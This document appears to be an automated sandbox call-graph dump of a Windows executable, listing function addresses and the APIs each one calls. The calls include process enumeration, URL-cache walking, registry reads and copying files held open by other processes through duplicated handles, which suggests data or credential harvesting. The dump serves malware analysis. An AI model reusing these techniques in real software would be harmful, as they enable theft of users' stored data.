calls 38675->39319 39320 409b98 GetFileAttributesW 38676->39320 38693 40b633 ??3@YAXPAX 38692->38693 38694 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38693->38694 38695 413f00 Process32NextW 38694->38695 38696 413da5 OpenProcess 38695->38696 38697 413f17 CloseHandle 38695->38697 38698 413df3 memset 38696->38698 38702 413eb0 38696->38702 38697->38438 39618 413f27 38698->39618 38700 413ebf ??3@YAXPAX 38700->38702 38701 4099f4 3 API calls 38701->38702 38702->38695 38702->38700 38702->38701 38704 413e37 GetModuleHandleW 38705 413e46 GetProcAddress 38704->38705 38706 413e1f 38704->38706 38705->38706 38706->38704 39623 413959 38706->39623 39639 413ca4 38706->39639 38708 413ea2 CloseHandle 38708->38702 38710 414c2e 16 API calls 38709->38710 38711 403eb7 38710->38711 38712 414c2e 16 API calls 38711->38712 38713 403ec5 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 403ee2 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403efd 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403f15 38718->38719 38720 403af5 20 API calls 38719->38720 38721 403f29 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f3a 38722->38723 38724 40414f 33 API calls 38723->38724 38725 403f4f 38724->38725 38726 403faf 38725->38726 38728 403f5b memset 38725->38728 38730 4099c6 2 API calls 38725->38730 38731 40a8ab 9 API calls 38725->38731 39653 40b1ab ??3@YAXPAX ??3@YAXPAX 38726->39653 38728->38725 38729 403fb7 38729->38384 38730->38725 38731->38725 38733 414c2e 16 API calls 38732->38733 38734 403d26 38733->38734 38735 414c2e 16 API calls 38734->38735 38736 403d34 38735->38736 38737 409d1f 6 API calls 38736->38737 38738 403d51 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d6c 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d84 38741->38742 38743 403af5 20 API calls 38742->38743 38744 403d98 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403da9 38745->38746 38747 40414f 33 API calls 38746->38747 38748 403dbe 38747->38748 38749 403e1e 38748->38749 38750 403dca memset 38748->38750 38753 4099c6 2 API calls 38748->38753 38754 40a8ab 9 API calls 38748->38754 39654 40b1ab ??3@YAXPAX ??3@YAXPAX 38749->39654 38750->38748 38752 403e26 38752->38388 38753->38748 38754->38748 38756 414b81 9 API calls 38755->38756 38757 414c40 38756->38757 38758 414c73 memset 38757->38758 39655 409cea 38757->39655 38760 414c94 38758->38760 39658 414592 RegOpenKeyExW 38760->39658 38762 414c64 38762->38379 38764 414cc1 38765 414cf4 wcscpy 38764->38765 39659 414bb0 wcscpy 38764->39659 38765->38762 38767 414cd2 39660 4145ac RegQueryValueExW 38767->39660 38769 414ce9 RegCloseKey 38769->38765 38771 409d62 38770->38771 38772 409d43 wcscpy 38770->38772 38771->38412 38773 409719 2 API calls 38772->38773 38774 409d51 wcscat 38773->38774 38774->38771 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38455 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38455 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38794 4453c4 38788->38794 38789 40ae51 9 API calls 38789->38794 38790 4453f3 38792 40aebe FindClose 38790->38792 38791 40add4 2 API calls 38791->38794 38793 4453fe 38792->38793 38793->38455 38794->38789 38794->38790 38794->38791 38795 445403 253 API calls 38794->38795 38795->38794 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38455 38803->38802 38804->38387 38805->38441 38806->38422 38807->38422 38808->38456 38810 409c89 38809->38810 38810->38478 38811->38508 38813 413d39 38812->38813 38814 413d2f FreeLibrary 38812->38814 38815 40b633 ??3@YAXPAX 38813->38815 38814->38813 38816 413d42 38815->38816 38817 40b633 ??3@YAXPAX 38816->38817 38818 413d4a 38817->38818 38818->38336 38819->38339 38820->38390 38821->38404 38823 44db70 38822->38823 38824 40b6fc memset 38823->38824 38825 409c70 2 API calls 38824->38825 38826 40b732 wcsrchr 38825->38826 38827 40b743 38826->38827 38828 40b746 memset 38826->38828 38827->38828 38829 40b2cc 27 API calls 38828->38829 38830 40b76f 38829->38830 38831 409d1f 6 API calls 38830->38831 38832 40b783 38831->38832 39661 409b98 GetFileAttributesW 38832->39661 38834 40b792 38835 40b7c2 38834->38835 38836 409c70 2 API calls 38834->38836 39662 40bb98 38835->39662 38838 40b7a5 38836->38838 38840 40b2cc 27 API calls 38838->38840 38844 40b7b2 38840->38844 38841 40b837 FindCloseChangeNotification 38843 40b83e memset 38841->38843 38842 40b817 39696 409a45 GetTempPathW 38842->39696 39695 40a6e6 WideCharToMultiByte 38843->39695 38847 409d1f 6 API calls 38844->38847 38847->38835 38848 40b827 CopyFileW 38848->38843 38849 40b866 38850 444432 121 API calls 38849->38850 38851 40b879 38850->38851 38852 40bad5 38851->38852 38853 40b273 27 API calls 38851->38853 38854 40baeb 38852->38854 38855 40bade DeleteFileW 38852->38855 38856 40b89a 38853->38856 38857 40b04b ??3@YAXPAX 38854->38857 38855->38854 38858 438552 134 API calls 38856->38858 38859 40baf3 38857->38859 38860 40b8a4 38858->38860 38859->38415 38861 40bacd 38860->38861 38863 4251c4 137 API calls 38860->38863 38862 443d90 111 API calls 38861->38862 38862->38852 38886 40b8b8 38863->38886 38864 40bac6 39708 424f26 123 API calls 38864->39708 38865 40b8bd memset 39699 425413 17 API calls 38865->39699 38868 425413 17 API calls 38868->38886 38871 40a71b MultiByteToWideChar 38871->38886 38872 40a734 MultiByteToWideChar 38872->38886 38875 40b9b5 memcmp 38875->38886 38876 4099c6 2 API calls 38876->38886 38877 404423 37 API calls 38877->38886 38880 40bb3e memset memcpy 39709 40a734 MultiByteToWideChar 38880->39709 38881 4251c4 137 API calls 38881->38886 38883 40bb88 LocalFree 38883->38886 38886->38864 38886->38865 38886->38868 38886->38871 38886->38872 38886->38875 38886->38876 38886->38877 38886->38880 38886->38881 38887 40ba5f memcmp 38886->38887 39700 4253ef 16 API calls 38886->39700 39701 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38886->39701 39702 4253af 17 API calls 38886->39702 39703 4253cf 17 API calls 38886->39703 39704 447280 memset 38886->39704 39705 447960 memset memcpy memcpy memcpy 38886->39705 39706 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38886->39706 39707 447920 memcpy memcpy memcpy 38886->39707 38887->38886 38888->38417 38890 40aed1 38889->38890 38891 40aec7 FindClose 38889->38891 38890->38349 38891->38890 38893 4099d7 38892->38893 38894 4099da memcpy 38892->38894 38893->38894 38894->38400 38896 40b2cc 27 API calls 38895->38896 38897 44543f 38896->38897 38898 409d1f 6 API calls 38897->38898 38899 44544f 38898->38899 39801 409b98 GetFileAttributesW 38899->39801 38901 44545e 38902 445476 38901->38902 38903 40b6ef 252 API calls 38901->38903 38904 40b2cc 27 API calls 38902->38904 38903->38902 38905 445482 38904->38905 38906 409d1f 6 API calls 38905->38906 38907 445492 38906->38907 39802 409b98 GetFileAttributesW 38907->39802 38909 4454a1 38910 4454b9 38909->38910 38911 40b6ef 252 API calls 38909->38911 38910->38430 38911->38910 38912->38429 38913->38446 38914->38452 38915->38489 38916->38467 38917->38516 38918->38516 38919->38499 38920->38527 38921->38529 38922->38531 38924 414c2e 16 API calls 38923->38924 38925 40c2ae 38924->38925 38995 40c1d3 38925->38995 38930 40c3be 38947 40a8ab 38930->38947 38931 40afcf 2 API calls 38932 40c2fd FindFirstUrlCacheEntryW 38931->38932 38933 40c3b6 38932->38933 38934 40c31e wcschr 38932->38934 38935 40b04b ??3@YAXPAX 38933->38935 38936 40c331 38934->38936 38937 40c35e FindNextUrlCacheEntryW 38934->38937 38935->38930 38938 40a8ab 9 API calls 38936->38938 38937->38934 38939 40c373 GetLastError 38937->38939 38942 40c33e wcschr 38938->38942 38940 40c3ad FindCloseUrlCache 38939->38940 38941 40c37e 38939->38941 38940->38933 38943 40afcf 2 API calls 38941->38943 38942->38937 38944 40c34f 38942->38944 38945 40c391 FindNextUrlCacheEntryW 38943->38945 38946 40a8ab 9 API calls 38944->38946 38945->38934 38945->38940 38946->38937 39089 40a97a 38947->39089 38950 40a8cc 38950->38538 38951 40a8d0 7 API calls 38951->38950 39094 40b1ab ??3@YAXPAX ??3@YAXPAX 38952->39094 38954 40c3dd 38955 40b2cc 27 API calls 38954->38955 38956 40c3e7 38955->38956 39095 414592 RegOpenKeyExW 38956->39095 38958 40c3f4 38959 40c50e 38958->38959 38960 40c3ff 38958->38960 38974 405337 38959->38974 38961 40a9ce 4 API calls 38960->38961 38962 40c418 memset 38961->38962 39096 40aa1d 38962->39096 38965 40c471 38967 40c47a _wcsupr 38965->38967 38966 40c505 RegCloseKey 38966->38959 38968 40a8d0 7 API calls 38967->38968 38969 40c498 38968->38969 38970 40a8d0 7 API calls 38969->38970 38971 40c4ac memset 38970->38971 38972 40aa1d 38971->38972 38973 40c4e4 RegEnumValueW 38972->38973 38973->38966 38973->38967 39098 405220 38974->39098 38978 4099c6 2 API calls 38977->38978 38979 40a714 _wcslwr 38978->38979 38980 40c634 38979->38980 39155 405361 38980->39155 38983 40c65c wcslen 39158 4053b6 39 API calls 38983->39158 38984 40c71d wcslen 38984->38545 38986 40c677 38987 40c713 38986->38987 39159 40538b 39 API calls 38986->39159 39161 4053df 39 API calls 38987->39161 38990 40c6a5 38990->38987 38991 40c6a9 memset 38990->38991 38992 40c6d3 38991->38992 39160 40c589 43 API calls 38992->39160 38994->38546 38996 40ae18 9 API calls 38995->38996 39002 40c210 38996->39002 38997 40ae51 9 API calls 38997->39002 38998 40c264 38999 40aebe FindClose 38998->38999 39001 40c26f 38999->39001 39000 40add4 2 API calls 39000->39002 39007 40e5ed memset memset 39001->39007 39002->38997 39002->38998 39002->39000 39003 40c231 _wcsicmp 39002->39003 39004 40c1d3 35 API calls 39002->39004 39003->39002 39005 40c248 39003->39005 39004->39002 39020 40c084 22 API calls 39005->39020 39008 414c2e 16 API calls 39007->39008 39009 40e63f 39008->39009 39010 409d1f 6 API calls 39009->39010 39011 40e658 39010->39011 39021 409b98 GetFileAttributesW 39011->39021 39013 40e667 39014 40e680 39013->39014 39015 409d1f 6 API calls 39013->39015 39022 409b98 GetFileAttributesW 39014->39022 39015->39014 39017 40e68f 39018 40c2d8 39017->39018 39023 40e4b2 39017->39023 39018->38930 39018->38931 39020->39002 39021->39013 39022->39017 39044 40e01e 39023->39044 39025 40e593 39027 40e5b0 39025->39027 39028 40e59c DeleteFileW 39025->39028 39026 40e521 39026->39025 39067 40e175 39026->39067 39029 40b04b ??3@YAXPAX 39027->39029 39028->39027 39030 40e5bb 39029->39030 39032 40e5c4 CloseHandle 39030->39032 39033 40e5cc 39030->39033 39032->39033 39035 40b633 ??3@YAXPAX 39033->39035 39034 40e573 39036 40e584 39034->39036 39037 40e57c FindCloseChangeNotification 39034->39037 39038 40e5db 39035->39038 39088 40b1ab ??3@YAXPAX ??3@YAXPAX 39036->39088 39037->39036 39041 40b633 ??3@YAXPAX 39038->39041 39040 40e540 39040->39034 39087 40e2ab 30 API calls 39040->39087 39042 40e5e3 39041->39042 39042->39018 39045 406214 22 API calls 39044->39045 39046 40e03c 39045->39046 39047 40e16b 39046->39047 39048 40dd85 74 API calls 39046->39048 39047->39026 39049 40e06b 39048->39049 39049->39047 39050 40afcf ??2@YAPAXI ??3@YAXPAX 39049->39050 39051 40e08d OpenProcess 39050->39051 39052 40e0a4 GetCurrentProcess DuplicateHandle 39051->39052 39056 40e152 39051->39056 39053 40e0d0 GetFileSize 39052->39053 39054 40e14a CloseHandle 39052->39054 39057 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39053->39057 39054->39056 39055 40e160 39059 40b04b ??3@YAXPAX 39055->39059 39056->39055 39058 406214 22 API calls 39056->39058 39060 40e0ea 39057->39060 39058->39055 39059->39047 39061 4096dc CreateFileW 39060->39061 39062 40e0f1 CreateFileMappingW 39061->39062 39063 40e140 CloseHandle CloseHandle 39062->39063 39064 40e10b MapViewOfFile 39062->39064 39063->39054 39065 40e13b FindCloseChangeNotification 39064->39065 39066 40e11f WriteFile UnmapViewOfFile 39064->39066 39065->39063 39066->39065 39068 40e18c 39067->39068 39069 406b90 11 API calls 39068->39069 39070 40e19f 39069->39070 39071 40e1a7 memset 39070->39071 39072 40e299 39070->39072 39077 40e1e8 39071->39077 39073 4069a3 ??3@YAXPAX ??3@YAXPAX 39072->39073 39074 40e2a4 39073->39074 39074->39040 39075 406e8f 13 API calls 39075->39077 39076 406b53 SetFilePointerEx ReadFile 39076->39077 39077->39075 39077->39076 39078 40e283 39077->39078 39079 40dd50 _wcsicmp 39077->39079 39083 40742e 8 API calls 39077->39083 39084 40aae3 wcslen wcslen _memicmp 39077->39084 39085 40e244 _snwprintf 39077->39085 39080 40e291 39078->39080 39081 40e288 ??3@YAXPAX 39078->39081 39079->39077 39082 40aa04 ??3@YAXPAX 39080->39082 39081->39080 39082->39072 39083->39077 39084->39077 39086 40a8d0 7 API calls 39085->39086 39086->39077 39087->39040 39088->39025 39091 40a980 39089->39091 39090 40a8bb 39090->38950 39090->38951 39091->39090 39092 40a995 _wcsicmp 39091->39092 39093 40a99c wcscmp 39091->39093 39092->39091 39093->39091 39094->38954 39095->38958 39097 40aa23 RegEnumValueW 39096->39097 39097->38965 39097->38966 39099 405335 39098->39099 39100 40522a 39098->39100 39099->38545 39101 40b2cc 27 API calls 39100->39101 39102 405234 39101->39102 39103 40a804 8 API calls 39102->39103 39104 40523a 39103->39104 39143 40b273 39104->39143 39106 405248 _mbscpy _mbscat GetProcAddress 39107 40b273 27 API calls 39106->39107 39108 405279 39107->39108 39146 405211 GetProcAddress 39108->39146 39110 405282 39111 40b273 27 API calls 39110->39111 39112 40528f 39111->39112 39147 405211 GetProcAddress 39112->39147 39114 405298 39115 40b273 27 API calls 39114->39115 39116 4052a5 39115->39116 39148 405211 GetProcAddress 39116->39148 39118 4052ae 39119 40b273 27 API calls 39118->39119 39120 4052bb 39119->39120 39149 405211 GetProcAddress 39120->39149 39122 4052c4 39123 40b273 27 API calls 39122->39123 39124 4052d1 39123->39124 39150 405211 GetProcAddress 39124->39150 39126 4052da 39127 40b273 27 API calls 39126->39127 39128 4052e7 39127->39128 39151 405211 GetProcAddress 39128->39151 39130 4052f0 39131 40b273 27 API calls 39130->39131 39132 4052fd 39131->39132 39152 405211 GetProcAddress 39132->39152 39134 405306 39135 40b273 27 API calls 39134->39135 39136 405313 39135->39136 39153 405211 GetProcAddress 39136->39153 39138 40531c 39139 40b273 27 API calls 39138->39139 39140 405329 39139->39140 39154 405211 GetProcAddress 39140->39154 39142 405332 39142->39099 39144 40b58d 27 API calls 39143->39144 39145 40b18c 39144->39145 39145->39106 39146->39110 39147->39114 39148->39118 39149->39122 39150->39126 39151->39130 39152->39134 39153->39138 39154->39142 39156 405220 39 API calls 39155->39156 39157 405369 39156->39157 39157->38983 39157->38984 39158->38986 39159->38990 39160->38987 39161->38984 39163 40440c FreeLibrary 39162->39163 39164 40436d 39163->39164 39165 40a804 8 API calls 39164->39165 39166 404377 39165->39166 39167 404383 39166->39167 39168 404405 39166->39168 39169 40b273 27 API calls 39167->39169 39168->38557 39168->38559 39168->38560 39170 40438d GetProcAddress 39169->39170 39171 40b273 27 API calls 39170->39171 39172 4043a7 GetProcAddress 39171->39172 39173 40b273 27 API calls 39172->39173 39174 4043ba GetProcAddress 39173->39174 39175 40b273 27 API calls 39174->39175 39176 4043ce GetProcAddress 39175->39176 39177 40b273 27 API calls 39176->39177 39178 4043e2 GetProcAddress 39177->39178 39179 4043f1 39178->39179 39180 4043f7 39179->39180 39181 40440c FreeLibrary 39179->39181 39180->39168 39181->39168 39183 404413 FreeLibrary 39182->39183 39184 40441e 39182->39184 39183->39184 39184->38574 39185->38565 39187 40442e 39186->39187 39188 40447e 39186->39188 39189 40b2cc 27 API calls 39187->39189 39188->38565 39190 404438 39189->39190 39191 40a804 8 API calls 39190->39191 39192 40443e 39191->39192 39193 404445 39192->39193 39194 404467 39192->39194 39195 40b273 27 API calls 39193->39195 39194->39188 39196 404475 FreeLibrary 39194->39196 39197 40444f GetProcAddress 39195->39197 39196->39188 39197->39194 39198 404460 39197->39198 39198->39194 39200 4135f6 39199->39200 39201 4135eb FreeLibrary 39199->39201 39200->38577 39201->39200 39203 4449c4 39202->39203 39204 444a52 39202->39204 39205 40b2cc 27 API calls 39203->39205 39204->38594 39204->38595 39206 4449cb 39205->39206 39207 40a804 8 API calls 39206->39207 39208 4449d1 39207->39208 39209 40b273 27 API calls 39208->39209 39210 4449dc GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 4449f3 GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 444a04 GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 444a15 GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 444a26 GetProcAddress 39217->39218 39219 40b273 27 API calls 39218->39219 39220 444a37 GetProcAddress 39219->39220 39221 40b273 27 API calls 39220->39221 39222 444a48 GetProcAddress 39221->39222 39222->39204 39223->38605 39224->38605 39225->38605 39226->38605 39227->38596 39229 403a29 39228->39229 39243 403bed memset memset 39229->39243 39231 403ae7 39256 40b1ab ??3@YAXPAX ??3@YAXPAX 39231->39256 39232 403a3f memset 39238 403a2f 39232->39238 39234 403aef 39234->38613 39235 409b98 GetFileAttributesW 39235->39238 39236 40a8d0 7 API calls 39236->39238 39237 409d1f 6 API calls 39237->39238 39238->39231 39238->39232 39238->39235 39238->39236 39238->39237 39240 40a051 GetFileTime FindCloseChangeNotification 39239->39240 39241 4039ca CompareFileTime 39239->39241 39240->39241 39241->38613 39242->38612 39244 414c2e 16 API calls 39243->39244 39245 403c38 39244->39245 39246 409719 2 API calls 39245->39246 39247 403c3f wcscat 39246->39247 39248 414c2e 16 API calls 39247->39248 39249 403c61 39248->39249 39250 409719 2 API calls 39249->39250 39251 403c68 wcscat 39250->39251 39257 403af5 39251->39257 39254 403af5 20 API calls 39255 403c95 39254->39255 39255->39238 39256->39234 39258 403b02 39257->39258 39259 40ae18 9 API calls 39258->39259 39267 403b37 39259->39267 39260 403bdb 39262 40aebe FindClose 39260->39262 39261 40add4 wcscmp wcscmp 39261->39267 39263 403be6 39262->39263 39263->39254 39264 40ae18 9 API calls 39264->39267 39265 40ae51 9 API calls 39265->39267 39266 40aebe FindClose 39266->39267 39267->39260 39267->39261 39267->39264 39267->39265 39267->39266 39268 40a8d0 7 API calls 39267->39268 39268->39267 39270 409d1f 6 API calls 39269->39270 39271 404190 39270->39271 39284 409b98 GetFileAttributesW 39271->39284 39273 40419c 39274 4041a7 6 API calls 39273->39274 39275 40435c 39273->39275 39277 40424f 39274->39277 39275->38639 39277->39275 39278 40425e memset 39277->39278 39280 409d1f 6 API calls 39277->39280 39281 40a8ab 9 API calls 39277->39281 39285 414842 39277->39285 39278->39277 39279 404296 wcscpy 39278->39279 39279->39277 39280->39277 39282 4042b6 memset memset _snwprintf wcscpy 39281->39282 39282->39277 39283->38637 39284->39273 39288 41443e 39285->39288 39287 414866 39287->39277 39289 41444b 39288->39289 39290 414451 39289->39290 39291 4144a3 GetPrivateProfileStringW 39289->39291 39292 414491 39290->39292 39293 414455 wcschr 39290->39293 39291->39287 39295 414495 WritePrivateProfileStringW 39292->39295 39293->39292 39294 414463 _snwprintf 39293->39294 39294->39295 39295->39287 39296->38643 39298 40b2cc 27 API calls 39297->39298 39299 409615 39298->39299 39300 409d1f 6 API calls 39299->39300 39301 409625 39300->39301 39326 409b98 GetFileAttributesW 39301->39326 39303 409634 39304 409648 39303->39304 39327 4091b8 memset 39303->39327 39306 40b2cc 27 API calls 39304->39306 39308 408801 39304->39308 39307 40965d 39306->39307 39309 409d1f 6 API calls 39307->39309 39308->38646 39308->38647 39310 40966d 39309->39310 39379 409b98 GetFileAttributesW 39310->39379 39312 40967c 39312->39308 39313 409681 39312->39313 39380 409529 72 API calls 39313->39380 39315 409690 39315->39308 39316->38669 39317->38646 39318->38674 39319->38646 39326->39303 39381 40a6e6 WideCharToMultiByte 39327->39381 39329 409202 39382 444432 39329->39382 39332 40b273 27 API calls 39333 409236 39332->39333 39428 438552 39333->39428 39336 409383 39338 40b273 27 API calls 39336->39338 39340 409399 39338->39340 39339 409254 39341 40937b 39339->39341 39449 4253cf 17 API calls 39339->39449 39342 438552 134 API calls 39340->39342 39453 424f26 123 API calls 39341->39453 39360 4093a3 39342->39360 39345 409267 39346 4094ff 39457 443d90 39346->39457 39349 4251c4 137 API calls 39349->39360 39351 409507 39359 40951d 39351->39359 39477 408f2f 77 API calls 39351->39477 39353 4093df 39456 424f26 123 API calls 39353->39456 39357 4253cf 17 API calls 39357->39360 39359->39304 39360->39346 39360->39349 39360->39353 39360->39357 39362 4093e4 39360->39362 39454 4253af 17 API calls 39362->39454 39369 4093ed 39455 4253af 17 API calls 39369->39455 39372 4093f9 39372->39353 39373 409409 memcmp 39372->39373 39373->39353 39374 409421 memcmp 39373->39374 39379->39312 39380->39315 39381->39329 39478 4438b5 39382->39478 39384 44444c 39390 409215 39384->39390 39492 415a6d 39384->39492 39386 4442e6 11 API calls 39388 44469e 39386->39388 39387 444486 39389 4444b9 memcpy 39387->39389 39427 4444a4 39387->39427 39388->39390 39392 443d90 111 API calls 39388->39392 39496 415258 39389->39496 39390->39332 39390->39359 39392->39390 39393 444524 39394 444541 39393->39394 39395 44452a 39393->39395 39499 444316 39394->39499 39396 416935 16 API calls 39395->39396 39396->39427 39399 444316 18 API calls 39400 444563 39399->39400 39401 444316 18 API calls 39400->39401 39402 44456f 39401->39402 39403 444316 18 API calls 39402->39403 39404 44457f 39403->39404 39404->39427 39513 432d4e 39404->39513 39427->39386 39566 438460 39428->39566 39430 409240 39430->39336 39431 4251c4 39430->39431 39578 424f07 39431->39578 39433 4251e4 39434 4251f7 39433->39434 39435 4251e8 39433->39435 39586 4250f8 39434->39586 39585 4446ea 11 API calls 39435->39585 39437 4251f2 39437->39339 39439 425209 39442 425249 39439->39442 39445 4250f8 127 API calls 39439->39445 39446 425287 39439->39446 39594 4384e9 135 API calls 39439->39594 39595 424f74 124 API calls 39439->39595 39442->39446 39445->39439 39449->39345 39453->39336 39454->39369 39455->39372 39456->39346 39458 443da3 39457->39458 39459 443db6 39457->39459 39602 41707a 39458->39602 39459->39351 39461 443da8 39462 443dbc 39461->39462 39463 443dac 39461->39463 39607 4300e8 39462->39607 39615 4446ea 11 API calls 39463->39615 39477->39359 39479 4438d0 39478->39479 39489 4438c9 39478->39489 39480 415378 memcpy memcpy 39479->39480 39481 4438d5 39480->39481 39482 4154e2 10 API calls 39481->39482 39483 443906 39481->39483 39481->39489 39482->39483 39484 443970 memset 39483->39484 39483->39489 39487 44398b 39484->39487 39485 4439a0 39486 415700 10 API calls 39485->39486 39485->39489 39490 4439c0 39486->39490 39487->39485 39488 41975c 10 API calls 39487->39488 39488->39485 39489->39384 39490->39489 39491 418981 10 API calls 39490->39491 39491->39489 39493 415a77 39492->39493 39494 415a8d 39493->39494 39495 415a7e memset 39493->39495 39494->39387 39495->39494 39497 4438b5 11 API calls 39496->39497 39498 41525d 39497->39498 39498->39393 39500 444328 39499->39500 39501 444423 39500->39501 39502 44434e 39500->39502 39503 4446ea 11 API calls 39501->39503 39504 432d4e memset memset memcpy 39502->39504 39510 444381 39503->39510 39505 44435a 39504->39505 39507 444375 39505->39507 39512 44438b 39505->39512 39506 432d4e memset memset memcpy 39508 4443ec 39506->39508 39509 416935 16 API calls 39507->39509 39508->39510 39511 416935 16 API calls 39508->39511 39509->39510 39510->39399 39511->39510 39512->39506 39514 432d65 39513->39514 39515 432d58 39513->39515 39567 41703f 11 API calls 39566->39567 39568 43847a 39567->39568 39569 43848a 39568->39569 39570 43847e 39568->39570 39572 438270 134 API calls 39569->39572 39571 4446ea 11 API calls 39570->39571 39574 438488 39571->39574 39573 4384aa 39572->39573 39573->39574 39575 424f26 123 API calls 39573->39575 39574->39430 39576 4384bb 39575->39576 39577 438270 134 API calls 39576->39577 39577->39574 39579 424f1f 39578->39579 39580 424f0c 39578->39580 39582 424eea 11 API calls 39579->39582 39581 416760 11 API calls 39580->39581 39583 424f18 39581->39583 39584 424f24 39582->39584 39583->39433 39584->39433 39585->39437 39587 425108 39586->39587 39593 42510d 39586->39593 39588 424f74 124 API calls 39587->39588 39588->39593 39589 42569b 125 API calls 39590 42516e 39589->39590 39592 415c7d 16 API calls 39590->39592 39591 425115 39591->39439 39592->39591 39593->39589 39593->39591 39594->39439 39595->39439 39603 417085 39602->39603 39604 4170ab 39602->39604 39603->39604 39605 416760 11 API calls 39603->39605 39604->39461 39606 4170a4 39605->39606 39606->39461 39615->39459 39645 413f4f 39618->39645 39621 413f37 K32GetModuleFileNameExW 39622 413f4a 39621->39622 39622->38706 39624 413969 wcscpy 39623->39624 39625 41396c wcschr 39623->39625 39637 413a3a 39624->39637 39625->39624 39627 41398e 39625->39627 39650 4097f7 wcslen wcslen _memicmp 39627->39650 39629 41399a 39630 4139a4 memset 39629->39630 39631 4139e6 39629->39631 39651 409dd5 GetWindowsDirectoryW wcscpy 39630->39651 39633 413a31 wcscpy 39631->39633 39634 4139ec memset 39631->39634 39633->39637 39652 409dd5 GetWindowsDirectoryW wcscpy 39634->39652 39635 4139c9 wcscpy wcscat 39635->39637 39637->38706 39638 413a11 memcpy wcscat 39638->39637 39640 413cb0 GetModuleHandleW 39639->39640 39641 413cda 39639->39641 39640->39641 39642 413cbf GetProcAddress 39640->39642 39643 413ce3 GetProcessTimes 39641->39643 39644 413cf6 39641->39644 39642->39641 39643->38708 39644->38708 39646 413f2f 39645->39646 39647 413f54 39645->39647 39646->39621 39646->39622 39648 40a804 8 API calls 39647->39648 39649 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39648->39649 39649->39646 39650->39629 39651->39635 39652->39638 39653->38729 39654->38752 39656 409cf9 GetVersionExW 39655->39656 39657 409d0a 39655->39657 39656->39657 39657->38758 39657->38762 39658->38764 39659->38767 39660->38769 39661->38834 39663 40bba5 39662->39663 39710 40cc26 39663->39710 39666 40bd4b 39731 40cc0c 39666->39731 39671 40b2cc 27 API calls 39672 40bbef 39671->39672 39738 40ccf0 _wcsicmp 39672->39738 39674 40bbf5 39674->39666 39739 40ccb4 6 API calls 39674->39739 39676 40bc26 39677 40cf04 17 API calls 39676->39677 39678 40bc2e 39677->39678 39679 40bd43 39678->39679 39680 40b2cc 27 API calls 39678->39680 39681 40cc0c 4 API calls 39679->39681 39682 40bc40 39680->39682 39681->39666 39740 40ccf0 _wcsicmp 39682->39740 39684 40bc46 39684->39679 39685 40bc61 memset memset WideCharToMultiByte 39684->39685 39741 40103c strlen 39685->39741 39687 40bcc0 39688 40b273 27 API calls 39687->39688 39689 40bcd0 memcmp 39688->39689 39689->39679 39690 40bce2 39689->39690 39691 404423 37 API calls 39690->39691 39692 40bd10 39691->39692 39692->39679 39693 40bd3a LocalFree 39692->39693 39694 40bd1f memcpy 39692->39694 39693->39679 39694->39693 39695->38849 39697 409a74 GetTempFileNameW 39696->39697 39698 409a66 GetWindowsDirectoryW 39696->39698 39697->38848 39698->39697 39699->38886 39700->38886 39701->38886 39702->38886 39703->38886 39704->38886 39705->38886 39706->38886 39707->38886 39708->38861 39709->38883 39742 4096c3 CreateFileW 39710->39742 39712 40cc34 39713 40cc3d GetFileSize 39712->39713 39721 40bbca 39712->39721 39714 40afcf 2 API calls 39713->39714 39715 40cc64 39714->39715 39743 40a2ef ReadFile 39715->39743 39717 40cc71 39744 40ab4a MultiByteToWideChar 39717->39744 39719 40cc95 FindCloseChangeNotification 39720 40b04b ??3@YAXPAX 39719->39720 39720->39721 39721->39666 39722 40cf04 39721->39722 39723 40b633 ??3@YAXPAX 39722->39723 39724 40cf14 39723->39724 39750 40b1ab ??3@YAXPAX ??3@YAXPAX 39724->39750 39726 40bbdd 39726->39666 39726->39671 39727 40cf1b 39727->39726 39729 40cfef 39727->39729 39751 40cd4b 39727->39751 39730 40cd4b 14 API calls 39729->39730 39730->39726 39732 40b633 ??3@YAXPAX 39731->39732 39733 40cc15 39732->39733 39734 40aa04 ??3@YAXPAX 39733->39734 39735 40cc1d 39734->39735 39800 40b1ab ??3@YAXPAX ??3@YAXPAX 39735->39800 39737 40b7d4 memset CreateFileW 39737->38841 39737->38842 39738->39674 39739->39676 39740->39684 39741->39687 39742->39712 39743->39717 39745 40ab6b 39744->39745 39749 40ab93 39744->39749 39746 40a9ce 4 API calls 39745->39746 39747 40ab74 39746->39747 39748 40ab7c MultiByteToWideChar 39747->39748 39748->39749 39749->39719 39750->39727 39752 40cd7b 39751->39752 39785 40aa29 39752->39785 39754 40cef5 39755 40aa04 ??3@YAXPAX 39754->39755 39756 40cefd 39755->39756 39756->39727 39758 40aa29 6 API calls 39759 40ce1d 39758->39759 39760 40aa29 6 API calls 39759->39760 39761 40ce3e 39760->39761 39762 40ce6a 39761->39762 39793 40abb7 wcslen memmove 39761->39793 39763 40ce9f 39762->39763 39796 40abb7 wcslen memmove 39762->39796 39765 40a8d0 7 API calls 39763->39765 39769 40ceb5 39765->39769 39766 40ce56 39794 40aa71 wcslen 39766->39794 39768 40ce8b 39797 40aa71 wcslen 39768->39797 